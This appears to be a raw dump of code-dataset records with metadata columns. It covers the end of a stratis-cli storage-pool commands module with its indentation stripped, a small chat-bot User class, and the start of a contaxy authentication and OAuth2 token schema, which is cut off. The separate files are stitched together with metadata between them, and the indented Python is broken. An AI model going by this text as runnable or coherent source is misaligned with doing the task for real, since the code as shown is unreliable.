(True, namespace.key_desc)
if namespace.key_desc is not None
else (False, "")
),
"clevis_info": (False, ("", ""))
if clevis_info is None
else (True, clevis_info),
},
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to create the specified pool %s but stratisd "
"reports that it did not actually create the pool"
)
% pool_name
)
@staticmethod
def init_cache(namespace): # pylint: disable=too-many-locals
"""
Initialize the cache of an existing stratis pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pool_name = namespace.pool_name
(pool_object_path, _) = next(
pools(props={"Name": pool_name})
.require_unique_match(True)
.search(managed_objects)
)
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE)
((changed, devs_added), return_code, message) = Pool.Methods.InitCache(
get_object(pool_object_path), {"devices": blockdevs}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs as cache "
"to pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def list_pools(namespace):
"""
List all stratis pools.
"""
# pylint: disable=import-outside-toplevel
from ._data import MOPool, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
pools_with_props = [
MOPool(info) for objpath, info in pools().search(managed_objects)
]
def physical_size_triple(mopool):
"""
Calculate the triple to display for total physical size.
The format is total/used/free where the display value for each
member of the tuple are chosen automatically according to justbytes'
configuration.
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:returns: a string to display in the resulting list output
:rtype: str
"""
total_physical_size = Range(mopool.TotalPhysicalSize())
total_physical_used = get_property(mopool.TotalPhysicalUsed(), Range, None)
return size_triple(total_physical_size, total_physical_used)
def properties_string(mopool):
"""
Make a string encoding some important properties of the pool
:param mopool: an object representing all the properties of the pool
:type mopool: MOPool
:param props_map: a map of properties returned by GetAllProperties
:type props_map: dict of str * any
"""
def gen_string(has_property, code):
"""
Generate the display string for a boolean property
:param has_property: whether the property is true or false
:type has_property: bool or NoneType
:param str code: the code to generate the string for
:returns: the generated string
:rtype: str
"""
if has_property == True: # pylint: disable=singleton-comparison
prefix = " "
elif has_property == False: # pylint: disable=singleton-comparison
prefix = "~"
# This is only going to occur if the engine experiences an
# error while calculating a property or if our code has a bug.
else: # pragma: no cover
prefix = "?"
return prefix + code
props_list = [(mopool.HasCache(), "Ca"), (mopool.Encrypted(), "Cr")]
return ",".join(gen_string(x, y) for x, y in props_list)
format_uuid = (
(lambda mo_uuid: mo_uuid) if namespace.unhyphenated_uuids else to_hyphenated
)
def alert_string(mopool):
"""
Alert information to display, if any
:param mopool: object to access pool properties
:returns: string w/ alert information, "" if no alert
:rtype: str
"""
action_availability = PoolActionAvailability.from_str(
mopool.AvailableActions()
)
error_codes = action_availability.pool_maintenance_error_codes()
return ", ".join(sorted(str(code) for code in error_codes))
tables = [
(
mopool.Name(),
physical_size_triple(mopool),
properties_string(mopool),
format_uuid(mopool.Uuid()),
alert_string(mopool),
)
for mopool in pools_with_props
]
print_table(
["Name", "Total Physical", "Properties", "UUID", "Alerts"],
sorted(tables, key=lambda entry: entry[0]),
["<", ">", ">", ">", "<"],
)
@staticmethod
def destroy_pool(namespace):
"""
Destroy a stratis pool.
If no pool exists, the method succeeds.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Manager.Methods.DestroyPool(
proxy, {"pool": pool_object_path}
)
# This branch can be covered, since the engine will return an error
# if the pool can not be destroyed because it has filesystems.
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to destroy the specified pool %s but "
"stratisd reports that it did not actually "
"destroy the pool requested"
)
% namespace.pool_name
)
@staticmethod
def rename_pool(namespace):
"""
Rename a pool.
:raises StratisCliEngineError:
:raises StratisCliNoChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import ObjectManager, Pool, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.current})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Pool.Methods.SetName(
get_object(pool_object_path), {"name": namespace.new}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed:
raise StratisCliNoChangeError("rename", namespace.new)
@staticmethod
def add_data_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified data devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.DATA
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddDataDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the data tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def add_cache_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified cache devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddCacheDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the cache tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def unlock_pools(namespace):
"""
Unlock all of the encrypted pools that have been detected by the daemon
but are still locked.
:raises StratisCliIncoherenceError:
:raises StratisCliNoChangeError:
:raises StratisCliAggregateError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
proxy = get_object(TOP_OBJECT)
locked_pools = _fetch_locked_pools_property(proxy)
if locked_pools == {}: # pragma: no cover
raise StratisCliNoChangeError("unlock", "pools")
# This block is not covered as the sim engine does not simulate the
# management of unlocked devices, so locked_pools is always empty.
errors = [] # pragma: no cover
for uuid in locked_pools: # pragma: no cover
(
(is_some, unlocked_devices),
return_code,
message,
) = Manager.Methods.UnlockPool(
proxy, {"pool_uuid": uuid, "unlock_method": namespace.unlock_method}
)
if return_code != StratisdErrors.OK:
errors.append(
StratisCliPartialFailureError(
"unlock", "pool with UUID %s" % uuid, error_message=message
)
)
if is_some and unlocked_devices == []:
raise StratisCliIncoherenceError(
(
"stratisd reported that some existing devices are locked but "
"no new devices were unlocked during this operation"
)
)
if errors != []: # pragma: no cover
raise StratisCliAggregateError("unlock", "pool", errors)
@staticmethod
def explain_code(namespace):
"""
Print an explanation of pool error code.
"""
error_code = PoolMaintenanceErrorCode.from_str(namespace.code)
assert error_code is not None
print(error_code.explain()) | en | 0.646974 | # Copyright 2021 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Pool actions. # isort: STDLIB # isort: THIRDPARTY Generate a map of pools to which block devices they own :param managed_objects: the result of a GetManagedObjects call :type managed_objects: dict of str * dict :param to_be_added: the blockdevs to be added :type to_be_added: frozenset of str :param tier: tier to search for blockdevs to be added :type tier: _stratisd_constants.BlockDevTiers :returns: a map of pool names to sets of strings containing blockdevs they own :rtype: dict of str * frozenset of str # pylint: disable=import-outside-toplevel Check whether specified blockdevs are already in the other tier. :param managed_objects: the result of a GetManagedObjects call :type managed_objects: dict of str * dict :param to_be_added: the blockdevs to be added :type to_be_added: frozenset of str :param other_tier: the other tier, not the one requested :type other_tier: _stratisd_constants.BlockDevTiers :raises StratisCliInUseOtherTierError: if blockdevs are used by other tier Check whether specified blockdevs are already in the tier to which they are to be added. :param managed_objects: the result of a GetManagedObjects call :type managed_objects: dict of str * dict :param to_be_added: the blockdevs to be added :type to_be_added: frozenset of str :param this_tier: the tier requested :type this_tier: _stratisd_constants.BlockDevTiers :raises StratisCliPartialChangeError: if blockdevs are used by this tier :raises StratisCliInUseSameTierError: if blockdevs are used by this tier in another pool Fetch the LockedPools property from stratisd. :param proxy: proxy to the top object in stratisd :return: a representation of unlocked devices :rtype: dict :raises StratisCliEngineError: # pylint: disable=import-outside-toplevel Pool actions. Create a stratis pool. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: :raises StratisCliNameConflictError: # pylint: disable=import-outside-toplevel # pragma: no cover # pragma: no cover # pylint: disable=too-many-locals Initialize the cache of an existing stratis pool. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: # pylint: disable=import-outside-toplevel # pragma: no cover List all stratis pools. # pylint: disable=import-outside-toplevel Calculate the triple to display for total physical size. The format is total/used/free where the display value for each member of the tuple are chosen automatically according to justbytes' configuration. 
:param mopool: an object representing all the properties of the pool :type mopool: MOPool :returns: a string to display in the resulting list output :rtype: str Make a string encoding some important properties of the pool :param mopool: an object representing all the properties of the pool :type mopool: MOPool :param props_map: a map of properties returned by GetAllProperties :type props_map: dict of str * any Generate the display string for a boolean property :param has_property: whether the property is true or false :type has_property: bool or NoneType :param str code: the code to generate the string for :returns: the generated string :rtype: str # pylint: disable=singleton-comparison # pylint: disable=singleton-comparison # This is only going to occur if the engine experiences an # error while calculating a property or if our code has a bug. # pragma: no cover Alert information to display, if any :param mopool: object to access pool properties :returns: string w/ alert information, "" if no alert :rtype: str Destroy a stratis pool. If no pool exists, the method succeeds. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: # pylint: disable=import-outside-toplevel # This branch can be covered, since the engine will return an error # if the pool can not be destroyed because it has filesystems. # pragma: no cover Rename a pool. :raises StratisCliEngineError: :raises StratisCliNoChangeError: # pylint: disable=import-outside-toplevel # pragma: no cover # pylint: disable=too-many-locals Add specified data devices to a pool. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: :raises StratisCliInUseOtherTierError: :raises StratisCliInUseSameTierError: :raises StratisCliPartialChangeError: # pylint: disable=import-outside-toplevel # pragma: no cover # pragma: no cover # pylint: disable=too-many-locals Add specified cache devices to a pool. :raises StratisCliEngineError: :raises StratisCliIncoherenceError: :raises StratisCliInUseOtherTierError: :raises StratisCliInUseSameTierError: :raises StratisCliPartialChangeError: # pylint: disable=import-outside-toplevel # pragma: no cover Unlock all of the encrypted pools that have been detected by the daemon but are still locked. :raises StratisCliIncoherenceError: :raises StratisCliNoChangeError: :raises StratisCliAggregateError: # pylint: disable=import-outside-toplevel # pragma: no cover # This block is not covered as the sim engine does not simulate the # management of unlocked devices, so locked_pools is always empty. # pragma: no cover # pragma: no cover # pragma: no cover Print an explanation of pool error code. | 1.521061 | 2 |
synchrobot/chat_user.py | Esenin/telegram_vk_pipe_bot | 2 | 8522 | <reponame>Esenin/telegram_vk_pipe_bot<filename>synchrobot/chat_user.py
# -*- coding: utf-8 -*-
# Author: <NAME>
import calendar
import time
import datetime as dt
import json
class User(object):
def __init__(self, id, name, last_seen, want_time, muted, username="", additional_keys="{}"):
super(User, self).__init__()
self.id = id
self.name = name
self.username = username
self._last_seen = last_seen
self._want_time = want_time
self._muted = muted
self.dirty = True
self.other_keys = json.loads(additional_keys) if additional_keys else {}
def get_seen(self): return self._last_seen
def set_seen(self, seen):
self._last_seen = seen
self.dirty = True
last_seen = property(get_seen, set_seen)
def get_want_time(self): return self._want_time
def set_want_time(self, new_val):
self._want_time = new_val
self.dirty = True
want_time = property(get_want_time, set_want_time)
def get_muted(self): return self._muted
def set_muted(self, new_val):
self._muted = new_val
self.dirty = True
muted = property(get_muted, set_muted)
def update_seen_time(self):
self.last_seen = calendar.timegm(time.gmtime())
def __str__(self):
seen_str = dt.datetime.fromtimestamp(self.last_seen).strftime('%Y-%m-%d %H:%M:%S')
return "User: ({0}{1}, id: {2}, last_seen: {3}, want_time: {4}, muted: {5})".format(
self.name.encode('utf-8'), " (" + self.username + ")" if self.username else "", self.id, seen_str,
self.want_time, self.muted)
def serialized_keys(self):
return json.dumps(self.other_keys)
| # -*- coding: utf-8 -*-
# Author: <NAME>
import calendar
import time
import datetime as dt
import json
class User(object):
def __init__(self, id, name, last_seen, want_time, muted, username="", additional_keys="{}"):
super(User, self).__init__()
self.id = id
self.name = name
self.username = username
self._last_seen = last_seen
self._want_time = want_time
self._muted = muted
self.dirty = True
self.other_keys = json.loads(additional_keys) if additional_keys else {}
def get_seen(self): return self._last_seen
def set_seen(self, seen):
self._last_seen = seen
self.dirty = True
last_seen = property(get_seen, set_seen)
def get_want_time(self): return self._want_time
def set_want_time(self, new_val):
self._want_time = new_val
self.dirty = True
want_time = property(get_want_time, set_want_time)
def get_muted(self): return self._muted
def set_muted(self, new_val):
self._muted = new_val
self.dirty = True
muted = property(get_muted, set_muted)
def update_seen_time(self):
self.last_seen = calendar.timegm(time.gmtime())
def __str__(self):
seen_str = dt.datetime.fromtimestamp(self.last_seen).strftime('%Y-%m-%d %H:%M:%S')
return "User: ({0}{1}, id: {2}, last_seen: {3}, want_time: {4}, muted: {5})".format(
self.name.encode('utf-8'), " (" + self.username + ")" if self.username else "", self.id, seen_str,
self.want_time, self.muted)
def serialized_keys(self):
return json.dumps(self.other_keys) | en | 0.80418 | # -*- coding: utf-8 -*- # Author: <NAME> | 2.751409 | 3 |
backend/src/contaxy/schema/auth.py | Felipe-Renck/contaxy | 0 | 8523 | <gh_stars>0
from datetime import datetime, timezone
from enum import Enum
from typing import Dict, List, Optional
import pydantic
from fastapi import HTTPException, Path, status
from pydantic import BaseModel, EmailStr, Field
from contaxy.schema.exceptions import ClientValueError
from contaxy.schema.shared import MAX_DESCRIPTION_LENGTH
from contaxy.utils.fastapi_utils import as_form
USERS_KIND = "users"
ADMIN_ROLE = "roles/admin"
USER_ROLE = "roles/user"
class AccessLevel(str, Enum):
# Map to: select, insert, update, delete
READ = "read" # Viewer, view: Allows admin access , Can only view existing resources. Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data.
WRITE = "write" # Editor, edit, Contributor : Allows read/write access , Can create and manage all types of resources but can’t grant access to others. All viewer permissions, plus permissions for actions that modify state, such as changing existing resources.
ADMIN = "admin" # Owner : Allows read-only access. Has full access to all resources including the right to edit IAM, invite users, edit roles. All editor permissions and permissions for the following actions
# UNKNOWN = "unknown" # Deny?
@classmethod
def load(cls, access_level: str) -> "AccessLevel":
try:
return cls(access_level.strip().lower())
except ValueError:
raise ClientValueError(f"Access level is unknown {access_level}")
# return cls.UNKNOWN
class TokenPurpose(str, Enum):
USER_API_TOKEN = "user-api-token"
PROJECT_API_TOKEN = "project-api-token"
SERVICE_ACCESS_TOKEN = "service-access-token"
LOGIN_TOKEN = "login-token"
REFRESH_TOKEN = "refresh-token" # For user sessions
# DEPLOYMENT_TOKEN = "deployment-token"
contaxy_token_purposes = {purpose for purpose in TokenPurpose}
class TokenType(str, Enum):
SESSION_TOKEN = "session-token"
API_TOKEN = "api-token"
class AccessToken(BaseModel):
token: str = Field(
...,
example="<PASSWORD>",
description="API Token.",
)
token_type: TokenType = Field(
...,
example=TokenType.API_TOKEN,
description="The type of the token.",
)
subject: str = Field(
...,
example="users/dklqmomr2c8dx9cpb202dsqku",
description="Identifies the principal that is the subject of the token. Usually refers to the user to which the token is issued to.",
)
scopes: List[str] = Field(
...,
example=["projects#read"],
description="List of scopes associated with the token.",
)
created_at: Optional[datetime] = Field(
None,
description="Creation date of the token.",
)
expires_at: Optional[datetime] = Field(
None,
example="2021-04-25T10:20:30.400+02:30",
description="Date at which the token expires and, thereby, gets revoked.",
)
class ApiToken(AccessToken):
description: Optional[str] = Field(
None,
example="Token used for accesing project resources on my local machine.",
max_length=MAX_DESCRIPTION_LENGTH,
description="Short description about the context and usage of the token.",
)
created_by: Optional[str] = Field(
None,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="ID of the user that created this token.",
)
token_purpose: Optional[str] = Field(
None,
example=TokenPurpose.LOGIN_TOKEN,
description="The purpose of the token.",
)
class AuthorizedAccess(BaseModel):
authorized_subject: str
resource_name: Optional[str] = None
access_level: Optional[AccessLevel] = None
access_token: Optional[AccessToken] = None
# Oauth Specific Code
class OAuth2TokenGrantTypes(str, Enum):
PASSWORD = "password"
REFRESH_TOKEN = "refresh_token"
CLIENT_CREDENTIALS = "client_credentials"
AUTHORIZATION_CODE = "authorization_code"
# TODO: Replaced with pydantic class
# class OAuth2TokenRequestForm:
# """OAuth2 Token Endpoint Request Form."""
# def __init__(
# self,
# grant_type: OAuth2TokenGrantTypes = Form(
# ...,
# description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
# ),
# username: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s username."
# ),
# password: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s password."
# ),
# scope: Optional[str] = Form(
# None,
# description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
# ),
# client_id: Optional[str] = Form(
# None,
# description="The client identifier issued to the client during the registration process",
# ),
# client_secret: Optional[str] = Form(
# None,
# description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
# ),
# code: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
# ),
# redirect_uri: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
# ),
# refresh_token: Optional[str] = Form(
# None,
# description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
# ),
# set_as_cookie: Optional[bool] = Form(
# False,
# description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
# ),
# ):
# self.grant_type = grant_type
# self.username = username
# self.password = password
# self.scopes = []
# if scope:
# self.scopes = str(scope).split()
# self.client_id = client_id
# self.client_secret = client_secret
# self.code = code
# self.redirect_uri = redirect_uri
# self.refresh_token = refresh_token
# self.state = state
# self.set_as_cookie = set_as_cookie
@as_form
class OAuth2TokenRequestFormNew(BaseModel):
"""OAuth2 Token Endpoint Request Form."""
grant_type: OAuth2TokenGrantTypes = Field(
...,
description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
)
username: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s username."
)
password: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s password."
)
scope: Optional[str] = Field(
None,
description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
)
client_id: Optional[str] = Field(
None,
description="The client identifier issued to the client during the registration process",
)
client_secret: Optional[str] = Field(
None,
description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
)
code: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
)
redirect_uri: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
)
refresh_token: Optional[str] = Field(
None,
description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
)
state: Optional[str] = Field(
None,
description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
)
set_as_cookie: Optional[bool] = Field(
False,
description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
)
class OAuthToken(BaseModel):
token_type: str = Field(
..., description="The type of token this is, typically just the string `bearer`"
)
access_token: str = Field(..., description="The access token string.")
expires_in: Optional[int] = Field(
None,
description="The expiration time of the access token in seconds.",
)
refresh_token: Optional[str] = Field(
None, description="API token to refresh the sesion token (if it expires)."
)
scope: Optional[str] = Field(
None, description="The scopes contained in the access token."
)
id_token: Optional[str] = Field(
None,
description="OpenID Connect ID Token that encodes the user’s authentication information.",
)
class OAuthTokenIntrospection(BaseModel):
active: bool = Field(
...,
description="Indicator of whether or not the presented token is currently active.",
)
scope: Optional[str] = Field(
None,
description="A space-delimited list of scopes.",
)
client_id: Optional[str] = Field(
None,
description="Client identifier for the OAuth 2.0 client that requested this token.",
)
username: Optional[str] = Field(
None,
description="Human-readable identifier for the resource owner who authorized this token.",
)
token_type: Optional[str] = Field(
None,
description="Type of the token as defined in Section 5.1 of OAuth 2.0 [RFC6749].",
)
exp: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token will expire, as defined in JWT [RFC7519].",
)
iat: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token was originally issued, as defined in JWT [RFC7519].",
)
nbf: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token is not to be used before, as defined in JWT [RFC7519].",
)
sub: Optional[str] = Field(
None,
description="Subject of the token, as defined in JWT [RFC7519]. Usually a machine-readable identifier of the resource owner who authorized this token.",
)
aud: Optional[str] = Field(
None,
description="Service-specific string identifier or list of string identifiers representing the intended audience for this token, as defined in JWT [RFC7519].",
)
iss: Optional[str] = Field(
None,
description="String representing the issuer of this token, as defined in JWT [RFC7519].",
)
jti: Optional[str] = Field(
None,
description="String identifier for the token, as defined in JWT [RFC7519].",
)
uid: Optional[str] = Field(
None,
description="The user ID. This parameter is returned only if the token is an access token and the subject is an end user.",
)
class AuthorizeResponseType(str, Enum):
TOKEN = "token"
CODE = "code"
class OAuth2ErrorDetails(BaseModel):
error: str
class OAuth2Error(HTTPException):
"""Basic exception for OAuth errors.
Implements the [RFC6749 error response](https://tools.ietf.org/html/rfc6749#section-5.2).
"""
def __init__(
self,
error: str,
) -> None:
"""Initializes the exception.
Args:
error: A single ASCII error code from the ones defined in RFC6749.
"""
super(OAuth2Error, self).__init__(
status_code=status.HTTP_400_BAD_REQUEST,
detail=error,
)
# TODO: Not used right now
# class OAuth2AuthorizeRequestForm:
# """OAuth2 Authorize Endpoint Request Form."""
# def __init__(
# self,
# response_type: AuthorizeResponseType = Form(
# ...,
# description="Either code for requesting an authorization code or token for requesting an access token (implicit grant).",
# ),
# client_id: Optional[str] = Form(
# None, description="The public identifier of the client."
# ),
# redirect_uri: Optional[str] = Form(None, description="Redirection URL."),
# scope: Optional[str] = Form(
# None, description="The scope of the access request."
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery",
# ),
# nonce: Optional[str] = Form(None),
# ):
# self.response_type = response_type
# self.client_id = client_id
# self.redirect_uri = redirect_uri
# self.scope = scope
# self.state = state
# self.nonce = nonce
USER_ID_PARAM = Path(
...,
title="User ID",
description="A valid user ID.",
# TODO: add length restriction
)
# User Models
class UserBase(BaseModel):
username: Optional[str] = Field(
None,
example="john-doe",
description="A unique username on the system.",
) # nickname
email: Optional[EmailStr] = Field(
None, example="<EMAIL>", description="User email address."
)
disabled: bool = Field(
False,
description="Indicates that user is disabled. Disabling a user will prevent any access to user-accessible resources.",
)
class UserInput(UserBase):
pass
class UserRegistration(UserInput):
# The password is only part of the user input object and should never returned
# TODO: a password can only be changed when used via oauth password bearer
# TODO: System admin can change passwords for all users
password: Optional[str] = Field(
None,
description="Password for the user. The password will be stored in as a hash.",
)
class User(UserBase):
id: str = Field(
...,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="Unique ID of the user.",
)
technical_user: bool = Field(
False,
description="Indicates if the user is a technical user created by the system.",
)
created_at: datetime = Field(
default_factory=lambda: datetime.now(timezone.utc),
description="Timestamp of the user creation. Assigned by the server and read-only.",
)
last_activity: datetime = Field(
None, # If none the validator below will set last_activity to the create_at time
description="Last time the user accessed the system. Right now this is only updated when the user "
"calls the /users/me endpoint so that call should always be done when the user loads the UI.",
)
@pydantic.validator("last_activity", pre=True, always=True)
def default_last_activity(cls, v: datetime, *, values: Dict) -> datetime:
return v if v is not None else values["created_at"]
has_password: bool = Field(
True,
description="Indicates if the user log in with password or SSO",
)
| from datetime import datetime, timezone
from enum import Enum
from typing import Dict, List, Optional
import pydantic
from fastapi import HTTPException, Path, status
from pydantic import BaseModel, EmailStr, Field
from contaxy.schema.exceptions import ClientValueError
from contaxy.schema.shared import MAX_DESCRIPTION_LENGTH
from contaxy.utils.fastapi_utils import as_form
USERS_KIND = "users"
ADMIN_ROLE = "roles/admin"
USER_ROLE = "roles/user"
class AccessLevel(str, Enum):
# Map to: select, insert, update, delete
READ = "read" # Viewer, view: Allows admin access , Can only view existing resources. Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data.
WRITE = "write" # Editor, edit, Contributor : Allows read/write access , Can create and manage all types of resources but can’t grant access to others. All viewer permissions, plus permissions for actions that modify state, such as changing existing resources.
ADMIN = "admin" # Owner : Allows read-only access. Has full access to all resources including the right to edit IAM, invite users, edit roles. All editor permissions and permissions for the following actions
# UNKNOWN = "unknown" # Deny?
@classmethod
def load(cls, access_level: str) -> "AccessLevel":
try:
return cls(access_level.strip().lower())
except ValueError:
raise ClientValueError(f"Access level is unknown {access_level}")
# return cls.UNKNOWN
class TokenPurpose(str, Enum):
USER_API_TOKEN = "user-api-token"
PROJECT_API_TOKEN = "project-api-token"
SERVICE_ACCESS_TOKEN = "service-access-token"
LOGIN_TOKEN = "login-token"
REFRESH_TOKEN = "refresh-token" # For user sessions
# DEPLOYMENT_TOKEN = "deployment-token"
contaxy_token_purposes = {purpose for purpose in TokenPurpose}
class TokenType(str, Enum):
SESSION_TOKEN = "session-token"
API_TOKEN = "api-token"
class AccessToken(BaseModel):
token: str = Field(
...,
example="<PASSWORD>",
description="API Token.",
)
token_type: TokenType = Field(
...,
example=TokenType.API_TOKEN,
description="The type of the token.",
)
subject: str = Field(
...,
example="users/dklqmomr2c8dx9cpb202dsqku",
description="Identifies the principal that is the subject of the token. Usually refers to the user to which the token is issued to.",
)
scopes: List[str] = Field(
...,
example=["projects#read"],
description="List of scopes associated with the token.",
)
created_at: Optional[datetime] = Field(
None,
description="Creation date of the token.",
)
expires_at: Optional[datetime] = Field(
None,
example="2021-04-25T10:20:30.400+02:30",
description="Date at which the token expires and, thereby, gets revoked.",
)
class ApiToken(AccessToken):
description: Optional[str] = Field(
None,
example="Token used for accesing project resources on my local machine.",
max_length=MAX_DESCRIPTION_LENGTH,
description="Short description about the context and usage of the token.",
)
created_by: Optional[str] = Field(
None,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="ID of the user that created this token.",
)
token_purpose: Optional[str] = Field(
None,
example=TokenPurpose.LOGIN_TOKEN,
description="The purpose of the token.",
)
class AuthorizedAccess(BaseModel):
